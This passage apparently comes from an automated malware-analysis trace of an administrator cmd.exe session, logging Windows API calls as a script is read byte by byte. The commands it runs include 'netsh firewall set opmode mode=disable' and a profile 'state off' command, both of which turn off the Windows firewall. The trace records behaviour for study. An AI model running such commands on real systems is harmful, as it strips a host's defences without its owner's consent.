lpWideCharStr=0x7ff6de093c5a, cchWideChar=1 | out: lpWideCharStr="mcurrentprofile state off\n") returned 1 [0152.361] _get_osfhandle (_FileHandle=0) returned 0x264 [0152.361] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.361] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0152.361] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c5c, cchWideChar=1 | out: lpWideCharStr="ourrentprofile state off\n") returned 1 [0152.361] _get_osfhandle (_FileHandle=0) returned 0x264 [0152.361] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.361] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0152.361] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c5e, cchWideChar=1 | out: lpWideCharStr="drrentprofile state off\n") returned 1 [0152.361] _get_osfhandle (_FileHandle=0) returned 0x264 [0152.361] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.361] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0152.362] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c60, cchWideChar=1 | out: lpWideCharStr="erentprofile state off\n") returned 1 [0152.362] _get_osfhandle (_FileHandle=0) returned 0x264 [0152.362] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.362] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0152.362] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c62, cchWideChar=1 | out: lpWideCharStr=" entprofile state off\n") returned 1 [0152.362] _get_osfhandle (_FileHandle=0) returned 0x264 [0152.362] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.362] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0152.362] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c64, cchWideChar=1 | out: lpWideCharStr="mntprofile state off\n") returned 1 [0152.362] _get_osfhandle (_FileHandle=0) returned 0x264 [0152.362] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.362] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0152.362] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c66, cchWideChar=1 | out: lpWideCharStr="otprofile state off\n") returned 1 [0152.362] _get_osfhandle (_FileHandle=0) returned 0x264 [0152.362] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.362] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0152.362] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c68, cchWideChar=1 | out: lpWideCharStr="dprofile state off\n") returned 1 [0152.362] _get_osfhandle (_FileHandle=0) returned 0x264 [0152.362] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.362] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0152.362] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c6a, cchWideChar=1 | out: lpWideCharStr="erofile state off\n") returned 1 [0152.362] _get_osfhandle (_FileHandle=0) returned 0x264 [0152.362] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.362] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0152.362] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c6c, cchWideChar=1 | out: lpWideCharStr="=ofile state off\n") returned 1 [0152.362] _get_osfhandle (_FileHandle=0) returned 0x264 [0152.362] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.363] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0152.363] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c6e, cchWideChar=1 | out: lpWideCharStr="dfile state off\n") returned 1 [0152.363] _get_osfhandle (_FileHandle=0) returned 0x264 [0152.363] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.363] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0152.363] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c70, cchWideChar=1 | out: lpWideCharStr="iile state off\n") returned 1 [0152.363] _get_osfhandle (_FileHandle=0) returned 0x264 [0152.363] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.363] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0152.363] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c72, cchWideChar=1 | out: lpWideCharStr="sle state off\n") returned 1 [0152.363] _get_osfhandle (_FileHandle=0) returned 0x264 [0152.363] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.363] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0152.363] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c74, cchWideChar=1 | out: lpWideCharStr="ae state off\n") returned 1 [0152.363] _get_osfhandle (_FileHandle=0) returned 0x264 [0152.363] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.363] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0152.363] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c76, cchWideChar=1 | out: lpWideCharStr="b state off\n") returned 1 [0152.363] _get_osfhandle (_FileHandle=0) returned 0x264 [0152.363] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.363] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0152.363] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c78, cchWideChar=1 | out: lpWideCharStr="lstate off\n") returned 1 [0152.363] _get_osfhandle (_FileHandle=0) returned 0x264 [0152.363] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.363] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0152.364] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c7a, cchWideChar=1 | out: lpWideCharStr="etate off\n") returned 1 [0152.364] _get_osfhandle (_FileHandle=0) returned 0x264 [0152.364] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.364] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0152.364] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c7c, cchWideChar=1 | out: lpWideCharStr="\nate off\n") returned 1 [0152.364] _get_osfhandle (_FileHandle=0) returned 0x264 [0152.364] GetFileType (hFile=0x264) returned 0x3 [0152.364] _get_osfhandle (_FileHandle=0) returned 0x264 [0152.364] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.364] _get_osfhandle (_FileHandle=1) returned 0x274 [0152.364] GetFileType (hFile=0x274) returned 0x3 [0152.364] _get_osfhandle (_FileHandle=1) returned 0x274 [0152.364] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="netsh firewall set opmode mode=disable\n", cchWideChar=-1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="netsh firewall set opmode mode=disable\n", lpUsedDefaultChar=0x0) returned 40 [0152.364] WriteFile (in: hFile=0x274, lpBuffer=0x7ff6de089970*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x58b38ff5e8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesWritten=0x58b38ff5e8*=0x27, lpOverlapped=0x0) returned 1 [0152.364] GetProcessHeap () returned 0x1eeca2b0000 [0152.364] RtlAllocateHeap (HeapHandle=0x1eeca2b0000, Flags=0x8, Size=0x4012) returned 0x1eeca2b8bb0 [0152.364] GetProcessHeap () returned 0x1eeca2b0000 [0152.364] RtlFreeHeap (HeapHandle=0x1eeca2b0000, Flags=0x0, BaseAddress=0x1eeca2b8bb0) returned 1 [0152.365] _wcsicmp (_String1="netsh", _String2=")") returned 69 [0152.365] _wcsicmp (_String1="FOR", _String2="netsh") returned -8 [0152.365] _wcsicmp (_String1="FOR/?", _String2="netsh") returned -8 [0152.365] _wcsicmp (_String1="IF", _String2="netsh") returned -5 [0152.365] _wcsicmp (_String1="IF/?", _String2="netsh") returned -5 [0152.365] _wcsicmp (_String1="REM", _String2="netsh") returned 4 [0152.365] _wcsicmp (_String1="REM/?", _String2="netsh") returned 4 [0152.365] GetProcessHeap () returned 0x1eeca2b0000 [0152.365] RtlAllocateHeap (HeapHandle=0x1eeca2b0000, Flags=0x8, Size=0xb0) returned 0x1eeca2b6e30 [0152.365] GetProcessHeap () returned 0x1eeca2b0000 [0152.365] RtlAllocateHeap (HeapHandle=0x1eeca2b0000, Flags=0x8, Size=0x1c) returned 0x1eeca2b6c60 [0152.366] GetProcessHeap () returned 0x1eeca2b0000 [0152.366] RtlAllocateHeap (HeapHandle=0x1eeca2b0000, Flags=0x8, Size=0x54) returned 0x1eeca2c91f0 [0152.366] GetConsoleOutputCP () returned 0x1b5 [0152.814] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff6de08fbb0 | out: lpCPInfo=0x7ff6de08fbb0) returned 1 [0152.814] SetThreadUILanguage (LangId=0x0) returned 0x409 [0153.061] GetConsoleTitleW (in: lpConsoleTitle=0x58b38ff430, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 0x2b [0153.325] malloc (_Size=0xffce) returned 0x1eeca3d0840 [0153.325] ??_V@YAXPEAX@Z () returned 0x1eeca3d0840 [0153.325] malloc (_Size=0xffce) returned 0x1eeca3e0820 [0153.325] ??_V@YAXPEAX@Z () returned 0x1eeca3e0820 [0153.325] _wcsicmp (_String1="netsh", _String2="DIR") returned 10 [0153.325] _wcsicmp (_String1="netsh", _String2="ERASE") returned 9 [0153.325] _wcsicmp (_String1="netsh", _String2="DEL") returned 10 [0153.325] _wcsicmp (_String1="netsh", _String2="TYPE") returned -6 [0153.325] _wcsicmp (_String1="netsh", _String2="COPY") returned 11 [0153.325] _wcsicmp (_String1="netsh", _String2="CD") returned 11 [0153.325] _wcsicmp (_String1="netsh", _String2="CHDIR") returned 11 [0153.325] _wcsicmp (_String1="netsh", _String2="RENAME") returned -4 [0153.325] _wcsicmp (_String1="netsh", _String2="REN") returned -4 [0153.325] _wcsicmp (_String1="netsh", _String2="ECHO") returned 9 [0153.325] _wcsicmp (_String1="netsh", _String2="SET") returned -5 [0153.325] _wcsicmp (_String1="netsh", _String2="PAUSE") returned -2 [0153.325] _wcsicmp (_String1="netsh", _String2="DATE") returned 10 [0153.325] _wcsicmp (_String1="netsh", _String2="TIME") returned -6 [0153.325] _wcsicmp (_String1="netsh", _String2="PROMPT") returned -2 [0153.325] _wcsicmp (_String1="netsh", _String2="MD") returned 1 [0153.325] _wcsicmp (_String1="netsh", _String2="MKDIR") returned 1 [0153.325] _wcsicmp (_String1="netsh", _String2="RD") returned -4 [0153.325] _wcsicmp (_String1="netsh", _String2="RMDIR") returned -4 [0153.325] _wcsicmp (_String1="netsh", _String2="PATH") returned -2 [0153.325] _wcsicmp (_String1="netsh", _String2="GOTO") returned 7 [0153.325] _wcsicmp (_String1="netsh", _String2="SHIFT") returned -5 [0153.325] _wcsicmp (_String1="netsh", _String2="CLS") returned 11 [0153.325] _wcsicmp (_String1="netsh", _String2="CALL") returned 11 [0153.325] _wcsicmp (_String1="netsh", _String2="VERIFY") returned -8 [0153.325] _wcsicmp (_String1="netsh", _String2="VER") returned -8 [0153.325] _wcsicmp (_String1="netsh", _String2="VOL") returned -8 [0153.325] _wcsicmp (_String1="netsh", _String2="EXIT") returned 9 [0153.326] _wcsicmp (_String1="netsh", _String2="SETLOCAL") returned -5 [0153.326] _wcsicmp (_String1="netsh", _String2="ENDLOCAL") returned 9 [0153.326] _wcsicmp (_String1="netsh", _String2="TITLE") returned -6 [0153.326] _wcsicmp (_String1="netsh", _String2="START") returned -5 [0153.326] _wcsicmp (_String1="netsh", _String2="DPATH") returned 10 [0153.326] _wcsicmp (_String1="netsh", _String2="KEYS") returned 3 [0153.326] _wcsicmp (_String1="netsh", _String2="MOVE") returned 1 [0153.326] _wcsicmp (_String1="netsh", _String2="PUSHD") returned -2 [0153.326] _wcsicmp (_String1="netsh", _String2="POPD") returned -2 [0153.326] _wcsicmp (_String1="netsh", _String2="ASSOC") returned 13 [0153.326] _wcsicmp (_String1="netsh", _String2="FTYPE") returned 8 [0153.326] _wcsicmp (_String1="netsh", _String2="BREAK") returned 12 [0153.326] _wcsicmp (_String1="netsh", _String2="COLOR") returned 11 [0153.326] _wcsicmp (_String1="netsh", _String2="MKLINK") returned 1 [0153.326] _wcsicmp (_String1="netsh", _String2="DIR") returned 10 [0153.326] _wcsicmp (_String1="netsh", _String2="ERASE") returned 9 [0153.326] _wcsicmp (_String1="netsh", _String2="DEL") returned 10 [0153.326] _wcsicmp (_String1="netsh", _String2="TYPE") returned -6 [0153.326] _wcsicmp (_String1="netsh", _String2="COPY") returned 11 [0153.326] _wcsicmp (_String1="netsh", _String2="CD") returned 11 [0153.326] _wcsicmp (_String1="netsh", _String2="CHDIR") returned 11 [0153.326] _wcsicmp (_String1="netsh", _String2="RENAME") returned -4 [0153.326] _wcsicmp (_String1="netsh", _String2="REN") returned -4 [0153.326] _wcsicmp (_String1="netsh", _String2="ECHO") returned 9 [0153.326] _wcsicmp (_String1="netsh", _String2="SET") returned -5 [0153.326] _wcsicmp (_String1="netsh", _String2="PAUSE") returned -2 [0153.326] _wcsicmp (_String1="netsh", _String2="DATE") returned 10 [0153.326] _wcsicmp (_String1="netsh", _String2="TIME") returned -6 [0153.326] _wcsicmp (_String1="netsh", _String2="PROMPT") returned -2 [0153.326] _wcsicmp (_String1="netsh", _String2="MD") returned 1 [0153.326] _wcsicmp (_String1="netsh", _String2="MKDIR") returned 1 [0153.326] _wcsicmp (_String1="netsh", _String2="RD") returned -4 [0153.326] _wcsicmp (_String1="netsh", _String2="RMDIR") returned -4 [0153.326] _wcsicmp (_String1="netsh", _String2="PATH") returned -2 [0153.326] _wcsicmp (_String1="netsh", _String2="GOTO") returned 7 [0153.326] _wcsicmp (_String1="netsh", _String2="SHIFT") returned -5 [0153.326] _wcsicmp (_String1="netsh", _String2="CLS") returned 11 [0153.326] _wcsicmp (_String1="netsh", _String2="CALL") returned 11 [0153.326] _wcsicmp (_String1="netsh", _String2="VERIFY") returned -8 [0153.327] _wcsicmp (_String1="netsh", _String2="VER") returned -8 [0153.327] _wcsicmp (_String1="netsh", _String2="VOL") returned -8 [0153.327] _wcsicmp (_String1="netsh", _String2="EXIT") returned 9 [0153.327] _wcsicmp (_String1="netsh", _String2="SETLOCAL") returned -5 [0153.327] _wcsicmp (_String1="netsh", _String2="ENDLOCAL") returned 9 [0153.327] _wcsicmp (_String1="netsh", _String2="TITLE") returned -6 [0153.327] _wcsicmp (_String1="netsh", _String2="START") returned -5 [0153.327] _wcsicmp (_String1="netsh", _String2="DPATH") returned 10 [0153.327] _wcsicmp (_String1="netsh", _String2="KEYS") returned 3 [0153.327] _wcsicmp (_String1="netsh", _String2="MOVE") returned 1 [0153.327] _wcsicmp (_String1="netsh", _String2="PUSHD") returned -2 [0153.327] _wcsicmp (_String1="netsh", _String2="POPD") returned -2 [0153.327] _wcsicmp (_String1="netsh", _String2="ASSOC") returned 13 [0153.327] _wcsicmp (_String1="netsh", _String2="FTYPE") returned 8 [0153.327] _wcsicmp (_String1="netsh", _String2="BREAK") returned 12 [0153.327] _wcsicmp (_String1="netsh", _String2="COLOR") returned 11 [0153.327] _wcsicmp (_String1="netsh", _String2="MKLINK") returned 1 [0153.327] _wcsicmp (_String1="netsh", _String2="FOR") returned 8 [0153.327] _wcsicmp (_String1="netsh", _String2="IF") returned 5 [0153.327] _wcsicmp (_String1="netsh", _String2="REM") returned -4 [0153.327] ??_V@YAXPEAX@Z () returned 0x1 [0153.327] GetProcessHeap () returned 0x1eeca2b0000 [0153.327] RtlAllocateHeap (HeapHandle=0x1eeca2b0000, Flags=0x8, Size=0xffde) returned 0x1eeca2b8bb0 [0153.328] GetProcessHeap () returned 0x1eeca2b0000 [0153.328] RtlAllocateHeap (HeapHandle=0x1eeca2b0000, Flags=0x8, Size=0x60) returned 0x1eeca2c8ba0 [0153.328] _wcsnicmp (_String1="nets", _String2="cmd ", _MaxCount=0x4) returned 11 [0153.328] malloc (_Size=0xffce) returned 0x1eeca3e0820 [0153.328] ??_V@YAXPEAX@Z () returned 0x1eeca3e0820 [0153.328] GetProcessHeap () returned 0x1eeca2b0000 [0153.328] RtlAllocateHeap (HeapHandle=0x1eeca2b0000, Flags=0x8, Size=0x1ffac) returned 0x1eeca2cc0e0 [0153.330] SetErrorMode (uMode=0x0) returned 0x0 [0153.330] SetErrorMode (uMode=0x1) returned 0x0 [0153.330] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x1eeca2cc0f0, lpFilePart=0x58b38fecb0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x58b38fecb0*="system32") returned 0x13 [0153.330] SetErrorMode (uMode=0x0) returned 0x1 [0153.330] GetProcessHeap () returned 0x1eeca2b0000 [0153.330] RtlReAllocateHeap (Heap=0x1eeca2b0000, Flags=0x0, Ptr=0x1eeca2cc0e0, Size=0x44) returned 0x1eeca2cc0e0 [0153.330] GetProcessHeap () returned 0x1eeca2b0000 [0153.330] RtlSizeHeap (HeapHandle=0x1eeca2b0000, Flags=0x0, MemoryPointer=0x1eeca2cc0e0) returned 0x44 [0153.331] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff6de08bb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0153.331] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0153.331] GetProcessHeap () returned 0x1eeca2b0000 [0153.331] RtlAllocateHeap (HeapHandle=0x1eeca2b0000, Flags=0x8, Size=0x1b4) returned 0x1eeca2c8c10 [0153.331] GetProcessHeap () returned 0x1eeca2b0000 [0153.331] RtlAllocateHeap (HeapHandle=0x1eeca2b0000, Flags=0x8, Size=0x358) returned 0x1eeca2c8dd0 [0153.331] GetProcessHeap () returned 0x1eeca2b0000 [0153.331] RtlReAllocateHeap (Heap=0x1eeca2b0000, Flags=0x0, Ptr=0x1eeca2c8dd0, Size=0x1b6) returned 0x1eeca2c8dd0 [0153.331] GetProcessHeap () returned 0x1eeca2b0000 [0153.331] RtlSizeHeap (HeapHandle=0x1eeca2b0000, Flags=0x0, MemoryPointer=0x1eeca2c8dd0) returned 0x1b6 [0153.331] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff6de08bb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0153.331] GetProcessHeap () returned 0x1eeca2b0000 [0153.331] RtlAllocateHeap (HeapHandle=0x1eeca2b0000, Flags=0x8, Size=0xe8) returned 0x1eeca2c8fa0 [0153.331] GetProcessHeap () returned 0x1eeca2b0000 [0153.331] RtlReAllocateHeap (Heap=0x1eeca2b0000, Flags=0x0, Ptr=0x1eeca2c8fa0, Size=0x7e) returned 0x1eeca2c8fa0 [0153.331] GetProcessHeap () returned 0x1eeca2b0000 [0153.331] RtlSizeHeap (HeapHandle=0x1eeca2b0000, Flags=0x0, MemoryPointer=0x1eeca2c8fa0) returned 0x7e [0153.332] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0153.332] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\netsh.*", fInfoLevelId=0x1, lpFindFileData=0x58b38fea20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x58b38fea20) returned 0x1eeca2c9030 [0153.332] FindClose (in: hFindFile=0x1eeca2c9030 | out: hFindFile=0x1eeca2c9030) returned 1 [0153.332] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\netsh.COM", fInfoLevelId=0x1, lpFindFileData=0x58b38fea20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x58b38fea20) returned 0xffffffffffffffff [0153.332] GetLastError () returned 0x2 [0153.333] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\netsh.EXE", fInfoLevelId=0x1, lpFindFileData=0x58b38fea20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x58b38fea20) returned 0x1eeca2c9030 [0153.333] FindClose (in: hFindFile=0x1eeca2c9030 | out: hFindFile=0x1eeca2c9030) returned 1 [0153.333] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0153.333] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0153.333] ??_V@YAXPEAX@Z () returned 0x1 [0153.333] GetConsoleTitleW (in: lpConsoleTitle=0x58b38fefa0, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 0x2b [0153.645] GetProcessHeap () returned 0x1eeca2b0000 [0153.645] RtlAllocateHeap (HeapHandle=0x1eeca2b0000, Flags=0x8, Size=0x21c) returned 0x1eeca2c9510 [0153.645] GetConsoleTitleW (in: lpConsoleTitle=0x1eeca2c9520, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 0x2b [0153.851] GetProcessHeap () returned 0x1eeca2b0000 [0153.851] RtlReAllocateHeap (Heap=0x1eeca2b0000, Flags=0x0, Ptr=0x1eeca2c9510, Size=0xc8) returned 0x1eeca2c9510 [0153.851] GetProcessHeap () returned 0x1eeca2b0000 [0153.852] RtlSizeHeap (HeapHandle=0x1eeca2b0000, Flags=0x0, MemoryPointer=0x1eeca2c9510) returned 0xc8 [0153.852] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe - netsh firewall set opmode 